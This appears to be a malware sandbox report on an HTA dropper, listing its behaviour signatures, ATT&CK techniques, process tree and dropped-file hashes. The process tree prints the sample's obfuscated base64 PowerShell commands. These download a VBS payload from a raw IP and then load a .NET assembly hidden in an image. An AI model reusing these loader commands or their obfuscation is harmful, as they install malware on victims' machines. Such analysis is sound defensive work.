cc7d77d7eaf78658e21a950213d1a21c9bc45b1ba279400cbd984468ee721d20

Analysis

max time kernel
122s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
28-01-2025 08:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

shereallyliketokissy9uuoisheismygirlfriendswholovesmetrulygo.hta
Size

46KB
MD5

05887835a99ba5b4c9af5be59cbd3666
SHA1

c3354d324fd9abe310cb080d80ddd55b02785f92
SHA256

cc7d77d7eaf78658e21a950213d1a21c9bc45b1ba279400cbd984468ee721d20
SHA512

51af02d7eefdee5fa6e7d327575f137efa1af38037875c2141c37156b2bc10afabbdcd15cb0fd436ddce6d6ae55b896ff03702a3ca774fc8988f99a888af48da
SSDEEP

96:IQtaPnLI1mIAvBIAhYcJfw3KwZYxxUunyklIAZBIA35xmIIASGjz:tta/MnAGAFwZYEAMAYASGjz

Score

8^/10

defense_evasion discovery execution

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	2292	powershell.exe
6	2240	powershell.exe
8	2240	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2292	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2240	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2292	powershell.exe
2240	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeDebugPrivilege	2240	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 604 wrote to memory of 2480	604	mshta.exe	31
PID 604 wrote to memory of 2480	604	mshta.exe	31
PID 604 wrote to memory of 2480	604	mshta.exe	31
PID 604 wrote to memory of 2480	604	mshta.exe	31
PID 2480 wrote to memory of 2292	2480	cmd.exe	33
PID 2480 wrote to memory of 2292	2480	cmd.exe	33
PID 2480 wrote to memory of 2292	2480	cmd.exe	33
PID 2480 wrote to memory of 2292	2480	cmd.exe	33
PID 2292 wrote to memory of 2708	2292	powershell.exe	34
PID 2292 wrote to memory of 2708	2292	powershell.exe	34
PID 2292 wrote to memory of 2708	2292	powershell.exe	34
PID 2292 wrote to memory of 2708	2292	powershell.exe	34
PID 2708 wrote to memory of 2112	2708	csc.exe	35
PID 2708 wrote to memory of 2112	2708	csc.exe	35
PID 2708 wrote to memory of 2112	2708	csc.exe	35
PID 2708 wrote to memory of 2112	2708	csc.exe	35
PID 2292 wrote to memory of 2636	2292	powershell.exe	37
PID 2292 wrote to memory of 2636	2292	powershell.exe	37
PID 2292 wrote to memory of 2636	2292	powershell.exe	37
PID 2292 wrote to memory of 2636	2292	powershell.exe	37
PID 2636 wrote to memory of 2240	2636	WScript.exe	38
PID 2636 wrote to memory of 2240	2636	WScript.exe	38
PID 2636 wrote to memory of 2240	2636	WScript.exe	38
PID 2636 wrote to memory of 2240	2636	WScript.exe	38

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\shereallyliketokissy9uuoisheismygirlfriendswholovesmetrulygo.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:604
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c PoweRSHEll -eX BYpasS -NoP -w 1 -C DEviCECRedentIALDepLOymenT ; IeX($(IEX('[sYSTem.texT.EnCOding]'+[cHAr]0X3a+[CHAR]0X3A+'utF8.GEtSTRINg([System.coNvErt]'+[ChaR]58+[CHar]0x3A+'fROmbAsE64strinG('+[CHAR]34+'JFh2MGdxeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJkZUZpTkl0aW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVSlEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFnRGd4cnBhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBraW5MYmxLTyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFV3RFdLaixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImhCdWhHUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUVTcGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPeW5CbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYdjBncXo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNTIuMjI4LjIyOS4yMTQvMzAxL2NyZWFtaXNzaW5nZmFsb3ZlcnZlcnluaWNld2l0aGVudGlyZWl0aW1lZ3RvZ2V0bWVsc2VlLmdJRiIsIiRlTnY6QVBQREFUQVxjcmVhbW1pc3Npbmd0aGViZXN0dGhpbmNyZWFtbWlzc2luZ3RoZWJlcy52YnMiLDAsMCk7U3RhcnQtU2xFZVAoMyk7aU52b0tlLUVYcHJFU1Npb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxjcmVhbW1pc3Npbmd0aGViZXN0dGhpbmNyZWFtbWlzc2luZ3RoZWJlcy52YnMi'+[CHar]34+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2480
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PoweRSHEll -eX BYpasS -NoP -w 1 -C DEviCECRedentIALDepLOymenT ; IeX($(IEX('[sYSTem.texT.EnCOding]'+[cHAr]0X3a+[CHAR]0X3A+'utF8.GEtSTRINg([System.coNvErt]'+[ChaR]58+[CHar]0x3A+'fROmbAsE64strinG('+[CHAR]34+'JFh2MGdxeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJkZUZpTkl0aW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVSlEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFnRGd4cnBhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBraW5MYmxLTyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFV3RFdLaixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImhCdWhHUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUVTcGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPeW5CbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYdjBncXo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNTIuMjI4LjIyOS4yMTQvMzAxL2NyZWFtaXNzaW5nZmFsb3ZlcnZlcnluaWNld2l0aGVudGlyZWl0aW1lZ3RvZ2V0bWVsc2VlLmdJRiIsIiRlTnY6QVBQREFUQVxjcmVhbW1pc3Npbmd0aGViZXN0dGhpbmNyZWFtbWlzc2luZ3RoZWJlcy52YnMiLDAsMCk7U3RhcnQtU2xFZVAoMyk7aU52b0tlLUVYcHJFU1Npb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxjcmVhbW1pc3Npbmd0aGViZXN0dGhpbmNyZWFtbWlzc2luZ3RoZWJlcy52YnMi'+[CHar]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2292
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lovgh3w1.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2708
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE6E7.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE6E6.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2112
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\creammissingthebestthincreammissingthebes.vbs"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2636
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AcwBnAG4AaQBoAHQAdABzAGUAYgBlAGgAdABnAG4AaQBzAHMAaQBtAG0AYQBlAHIAYwAvADEAMAAzAC8ANAAxADIALgA5ADIAMgAuADgAMgAyAC4AMgA1ADEALwAvADoAcAB0AHQAaAAnADsAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAgAD0AIAAkAG8AcgBpAGcAaQBuAGEAbABUAGUAeAB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAG0AdwBuAG0AZQBtAGMAbQAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwA3ADkAOAA4ADcANwA4AC8AcAA5AGUAYQB3AGQAYgBvAHUAMABrAHUAawBrAGkAaAB0AHIAOAByAC4AagBwAGcAJwA7ACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGkAbQBhAGcAZQBVAHIAbAApADsAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGUAbgBkAEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJAB0AHkAcABlACAAPQAgAFsAQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMQAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBtAGEAaQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcgBlAHMAdABvAHIAZQBkAFQAZQB4AHQALAAnAGYAYQBsAHMAZQAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwBmAGEAbABzAGUAJwApACkA')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2240

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cab2B1.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE6E7.tmp

Filesize
1KB

MD5
fa0f135ab85dab3a5de64fe58254875d

SHA1
16f44ee502766ef55c9ef42707ef9469a3e5975e

SHA256
20ce6467ba4a8fd5e503622fe9a5a6f3f7bc956f3d83d80cd3411ba1c9cc31f1

SHA512
c960b27b8c138e448170fcd470fb69bd3df0d7efdfd735d20c827a72740a8e4ae9d2757622e58c7437a88e08c598e8c313e3e05fdf9f85d4a6d16b34c64185d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar2E3.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\lovgh3w1.dll

Filesize
3KB

MD5
783062d72b90df6c86273619e530ee8a

SHA1
0a1ae2916dfbe61851d6ec16ce4616238b0ba44b

SHA256
fd36ce5b1e14dbeffafc5fded0c4a37658a01d3859fc89d795d9e9ce5ada258c

SHA512
96eb5d52e7ecd40893a678708d5dfdc3fbfe51bedf4b85ca3a2449c744d18d787356244aad0f0a3cfcfe5052235dcfb8acacabb16062c1ef0091a773bb4cd210

Download Submit
C:\Users\Admin\AppData\Local\Temp\lovgh3w1.pdb

Filesize
7KB

MD5
3dbc582d8da3eb38ed9e87c5d0315277

SHA1
fe92d4bf75318df15bffabdb82f56c0dea91400b

SHA256
2bd06f7a8b39daf7385e5f11d01a056e3844f8efa1133efb22140e960f1a0435

SHA512
262d6e37d72ea0c7bdbdb2ba3343d13d02120132cccc8873d53cb5a5dda823e6af6592592b2e3c6486813d84428809afdf424499c98eacd0fc659852a2da391b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TQHG58W4DXDQ5FE8MH7Z.temp

Filesize
7KB

MD5
3569c9ec72763c1f0c86308b53e0f82b

SHA1
bf3bc844bfb9027b863d3cf17893298b25a14f57

SHA256
16c6577cf310be0401ec089bc88bfb929fd68efb9744eb9fc5e865e9cbb75ce6

SHA512
6e9097a396a08622ff84eeaa0fa83b4616c0ba94e9ceb643ad400b6087e94064a314b11e1e05e1ef9facc573e773986a583507061dfbaa797b195b8721add8a6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
b3721003eff4363c3ff4b596fd19c1ca

SHA1
a96d40f1b906d66b39a917e776ca23f3989ca93e

SHA256
b17055a9c6b03413b75e6664d64a2f97c0907fac0f93d723052fc3835729b42c

SHA512
5dcb1baa3ec728b75e3d9546ffa9971206a3af9706d314962b42a05436a4d7a199d857255479b8643a958eb2accffe39788b1b9dd6681084be52472575750a74

Download Submit
C:\Users\Admin\AppData\Roaming\creammissingthebestthincreammissingthebes.vbs

Filesize
221KB

MD5
341da1d84b2b18f5396d6920493180c1

SHA1
e53a670bd080ca4df1baf560ac85d2d2cf18d082

SHA256
e8518dc67c12129696b59cc127d2a066accb411452e6ca19f1507d9b8ce555d3

SHA512
f6f2c6353e7c0b51bfc0b80d1dfed3440b2f627dc2bb269f8ea73fca972910e757d08188758c3d10ab1e00a4f570b683c39c1e99e6f8abb265d9141f324b0c52

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCE6E6.tmp

Filesize
652B

MD5
d68e50193d70aea17b44dd29003975b6

SHA1
fafdfb4455ef1c4ebf4fd98bcab4622dfd396a1d

SHA256
7e74716e65a1c4ebfa0845290d023733e2d3dab5ea0cf18e44e235258003cc45

SHA512
a9267fdcb5da69a556727a06f3de48a42ce794f3b0eccaeec8933630e9f9adf88e738e03fa53e34e9fe960c4024fce919078d37cf1f9c45009aaebd0f49de929

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lovgh3w1.0.cs

Filesize
481B

MD5
f86ec8ebcf7dbba7c72c1ed4016ca07d

SHA1
6153ce1dbd28385ecd126a0e9ae4aea6a7e4d7bd

SHA256
dec30d002908c68e9db76d807bc2949e32b1d6d6519f864365562f24e2a94458

SHA512
53168e89cb4a5764b99c2f3bc189849c7cce45a1c8d32b98801f1a51d92d2893518a7d04b80a8b1cf03c1a109949e7ac9879f12cb98c6ac512e7376bf504f00c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lovgh3w1.cmdline

Filesize
309B

MD5
d4cf653400287d532aad706bae5f2ac2

SHA1
5bc89fd5025ce6b7c0e742a1a18999558485b393

SHA256
b947ac08b2ca7c4fe1fe6d8548f80b917fe4f7a63bf53ea46a83a026354a83da

SHA512
41ab34b496ab216ae52a5576817041967d59e98d6147bf792dbdcdce87e676c85bbeb9f9383cdc78bafa8aa6517aa6f90529a3eaa0baa5f9809d300fd27b6b59

Download Submit